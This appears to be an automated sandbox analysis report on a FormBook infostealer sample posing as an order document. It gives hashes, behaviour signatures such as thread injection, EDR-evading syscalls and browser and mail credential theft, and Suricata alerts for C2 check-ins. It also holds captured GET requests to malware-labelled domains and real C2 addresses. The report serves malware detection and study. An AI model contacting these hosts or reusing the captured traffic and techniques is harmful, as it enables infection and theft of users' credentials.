Windows Analysis Report
New Order#12125.exe

Overview

General Information

Sample name: New Order#12125.exe
Analysis ID: 1590082
MD5: 2a0dfbfc319b0082f4fcdc47317e7f23
SHA1: 82f2785464db11931b8653f349a7d0b62502c1c5
SHA256: a117f2f0d37c6e467b308cb625140d64edab045f59a422c2c7ae671098a52748
Tags: exe, user-James_inthe_box

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order#12125.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\New Order#12125.exe" MD5: 2A0DFBFC319B0082F4FCDC47317E7F23)
    • XcmmvCqVSCAb.exe (PID: 5780 cmdline: "C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • XcmmvCqVSCAb.exe (PID: 1484 cmdline: "C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 8060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.New Order#12125.exe.290000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

              AV Detection

              Source: New Order#12125.exe, Avira: detected
              Source: http://www.gayhxi.info/k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLohAvira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/Avira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw==Avira URL Cloud: Label: malware
              Source: New Order#12125.exe, Virustotal: Detection: 65%
              Source: New Order#12125.exe, ReversingLabs: Detection: 71%
              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: New Order#12125.exe, Joe Sandbox ML: detected
              Source: New Order#12125.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: New Order#12125.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: New Order#12125.exe, 00000000.00000003.1801698818.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3857137483.00000000013D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XcmmvCqVSCAb.exe, 00000003.00000000.1721505934.000000000001E000.00000002.00000001.01000000.00000005.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3849029999.000000000001E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: New Order#12125.exe, New Order#12125.exe, 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000002.1802265375.000000000166E000.00000040.00001000.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1705156829.0000000001321000.00000004.00000020.00020000.00000000.sdmp, New Order#12125.exe, 00000000.00000003.1702526408.000000000117C000.00000004.00000020.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3862729479.000000000384E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1801920951.0000000003347000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.1803992712.00000000034FD000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3862729479.00000000036B0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E6C870 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6C870
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax4_2_02E59EC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi4_2_02E5E4C7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h4_2_034904CE
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h9_2_0000023F860684CE

              Networking

              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49709 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49710 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49713 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49753 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49749 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49707 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49707 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49756 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49750 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49754 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49721 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 104.21.18.171:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 134.122.135.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49745 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 13.228.81.39:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 154.39.239.237:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49757 -> 154.39.239.237:80
              Source: Joe Sandbox View, IP Address: 154.197.162.239
              Source: Joe Sandbox View, IP Address: 104.21.18.171
              Source: Joe Sandbox View, IP Address: 199.192.21.169
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?60q4=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhhp4qHBhxLTG4/9m9WNTMgvCUOuzK4Dd8hoTr25U9f7tIQ==&XxGx=INH0eLoh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 14:14:00 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global traffic
              HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:14:11 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                x-pingback: http://cifasnc.info/xmlrpc.php
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                last-modified: Mon, 13 Jan 2025 14:14:11 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                pragma: no-cache
                vary: Accept-Encoding,User-Agent
                x-turbo-charged-by: LiteSpeed
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WztCxx0eK0vg2HKYMua7f25IHQr5jEqC68WM%2FZ2tposYXB%2Bn7Hwsr2CIf5mPTla9CnT%2FI81z9vGnJgBCWfNBdgwBFpvfiAvgO9txM8KLh9TZBMutm%2B6naSZRsLuWYeiY7jrh"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fdbf1e49c45c-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic
              HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:14:13 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                x-pingback: http://cifasnc.info/xmlrpc.php
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                last-modified: Mon, 13 Jan 2025 14:14:13 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                pragma: no-cache
                vary: Accept-Encoding,User-Agent
                x-turbo-charged-by: LiteSpeed
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHWRhTN%2F%2BKdcKIs8bVUyZIHsBXF6lQFk5n3ppahO7ud0yFXWHYp8LTkLzNwLgbD9B0JCbTtWncBCwI0dj1laOH9sgpW8fHALVDziLWql0gvk7qBBT6huNKKd1r9%2FXW0wNyZj"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fdcf4bd55e70-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic
              HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Mon, 13 Jan 2025 14:14:16 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                x-pingback: http://cifasnc.info/xmlrpc.php
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                last-modified: Mon, 13 Jan 2025 14:14:16 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                pragma: no-cache
                vary: Accept-Encoding,User-Agent
                x-turbo-charged-by: LiteSpeed
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BaLznEpSdqk%2F4rT0453YF2BVBhlZd%2FvKuH4kK%2FJtAvCbILR4fi70jaHf7BMt7HxjYc76wZt1ENhx2PgpeDKJvlLBV6t2egXNgAGRXqbI6ZRXPV5FRmSXVkR6WFuTxIx8uJ5"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 9015fddf0e82efa5-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1774&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: fc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg
              Source: fc.exe, 00000004.00000002.3864506422.0000000004EE6000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003B86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: XcmmvCqVSCAb.exe, 00000007.00000002.3864456444.0000000004E05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro
              Source: XcmmvCqVSCAb.exe, 00000007.00000002.3864456444.0000000004E05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro/b9e2/
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000004.00000002.3864506422.000000000470C000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000004.00000003.1987999474.0000000007E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033$J
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
